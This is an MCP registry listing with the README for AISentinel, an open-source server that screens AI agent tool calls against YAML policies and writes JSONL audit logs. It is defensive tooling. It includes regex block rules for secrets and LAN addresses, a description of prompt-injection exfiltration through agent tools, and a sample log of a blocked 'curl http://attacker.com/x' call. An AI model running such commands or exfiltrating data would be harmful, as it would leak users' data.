Server data from the Official MCP Registry
Pre-tool policy enforcement + JSONL audit for AI agents. Apache 2.0.
Pre-tool policy enforcement + JSONL audit for AI agents. Apache 2.0.
Valid MCP server (1 strong, 1 medium validity signals). No known CVEs in dependencies. Imported from the Official MCP Registry.
4 files analyzed · No issues found
Security scores are indicators to help you make informed decisions, not guarantees. Always review permissions before connecting any MCP server.
This plugin requests these system permissions. Most are normal for its category.
From the project's GitHub README.
The missing security, control, and observability layer for the agentic era.
Traditional security tools were built for malware. AI agents were given legitimate power through tools and APIs. AISentinel provides the missing security, control, and observability layer.
AISentinel — an open-source MCP server that protects AI agents at runtime. Built by Kabzhanov / BizDNAi, the team behind the AI Trust Index.
AI agents now have shell, browsers, file systems, and API keys. They are
legitimate processes — antivirus cannot see them. A single indirect
prompt injection in a PDF or email can pivot into mass data exfiltration
through ordinary tools like Bash and Email_send.
AISentinel closes that gap: it runs as an MCP server in front of every tool call, evaluates YAML policies, logs every decision, and ships an audit trail compatible with the AI Trust Index.
See docs/SECURITY_AUDIT.md for the full threat model.
go install github.com/Kabzhanov/AISentinel/cmd/aisentinel@latest
aisentinel --help
aisentinel serve --policy policies/default.yaml
go install github.com/Kabzhanov/AISentinel/cmd/aisentinel-sidecar@latest
# Wrap any stdio MCP server with one command:
aisentinel-sidecar ./your-mcp-server [args...]
git clone https://github.com/Kabzhanov/AISentinel.git
cd AISentinel
go build -o bin/aisentinel ./cmd/aisentinel
go build -o bin/aisentinel-sidecar ./cmd/aisentinel-sidecar
./bin/aisentinel serve --policy policies/default.yaml
Download from https://github.com/Kabzhanov/AISentinel/releases/latest.
Available for linux/amd64, linux/arm64, darwin/amd64, darwin/arm64,
windows/amd64.
{
"mcpServers": {
"aisentinel": {
"command": "aisentinel",
"args": ["serve", "--policy", "/absolute/path/to/policies/default.yaml"]
},
"aisentinel-sidecar": {
"command": "aisentinel-sidecar",
"args": ["--policy", "/absolute/path/to/policies/strict.yaml", "/path/to/your-mcp-server"]
}
}
}
Then restart your MCP client and ask your agent to call any tool —
AISentinel will gate every call and write a JSONL audit trail to
~/.aisentinel/events-YYYY-MM-DD.jsonl.
default, strict, audit-only (see policies/).aisentinel serve (Claude Code, Claude Desktop, Cursor, Cline, Continue).https://mcp.aisentinel.bizdnai.com/mcp (SaaS, OAuth via BizDNAi).aisentinel subcommands (serve, validate-policy, policies, events, version).github.com/Kabzhanov/AISentinel/internal/policy for embedding.See policies/default.yaml for the full default policy.
version: 1
name: default
rules:
- id: secret-in-args
match: { tool_args_regex: "(?i)(api[_-]?key|secret|token|password|passwd)" }
decision: block
reason: "Possible secret in arguments"
- id: lan-deny
match: { tool_name: "Bash", tool_args_regex: "10\\.|192\\.168\\.|172\\.(1[6-9]|2\\d|3[01])\\." }
decision: block
reason: "LAN access blocked by default"
Match modes: tool_name, tool_name_regex, tool_args_regex, tool_args_contains. Multiple matchers AND-combine.
AISentinel generates the observability data required for AI Trust Index assessments:
Run aisentinel_get_ati_snapshot to get a JSON blob ready to paste into
the AI Trust Index cabinet.
AISentinel is available under two licensing options:
Apache License 2.0 (Open Source)
Commercial License
By contributing to this repository, you agree to license your contributions under Apache 2.0.
See LICENSE and COMMERCIAL_LICENSE.md.
Requirements: Go 1.22+
go install github.com/Kabzhanov/AISentinel/cmd/aisentinel@latest
Verify:
aisentinel version
# AISentinel v1.0.0 — by Kabzhanov / BizDNAi / AI Trust Index
aisentinel serve --policy policies/default.yaml
aisentinel validate-policy my-policy.yaml
aisentinel events --last 20
aisentinel policies
AISENTINEL_DRY_RUN=1 aisentinel serve --policy policies/default.yaml
See docs/event-schema.md. One JSON object per line
in the JSONL log:
{
"event_id": "20260707T221500.000000001-1",
"timestamp": "2026-07-07T22:15:00Z",
"event_type": "pre_tool",
"agent_id": "agent-42",
"session_id": "sess-abc",
"tool_name": "Bash",
"tool_args": { "command": "curl http://attacker.com/x" },
"decision": "block",
"policy_matched": ["bash-network"],
"risk_signals": ["rule_matched:bash-network"]
}
See CONTRIBUTING.md. By contributing you agree to license your contribution under Apache 2.0.
aisentinel scan (MCP-config auditor), mobile connectors.Apache License 2.0. See LICENSE.
AISentinel is dual-licensed under Apache 2.0 and a commercial license. For commercial terms, contact kabzhanov@gmail.com.
By Kabzhanov / BizDNAi — creators of the AI Trust Index.
Be the first to review this server!
by Toleno · Developer Tools
Toleno Network MCP Server — Manage your Toleno mining account with Claude AI using natural language.
by mcp-marketplace · Developer Tools
Create, build, and publish Python MCP servers to PyPI — conversationally.
by Microsoft · Content & Media
Convert files (PDF, Word, Excel, images, audio) to Markdown for LLM consumption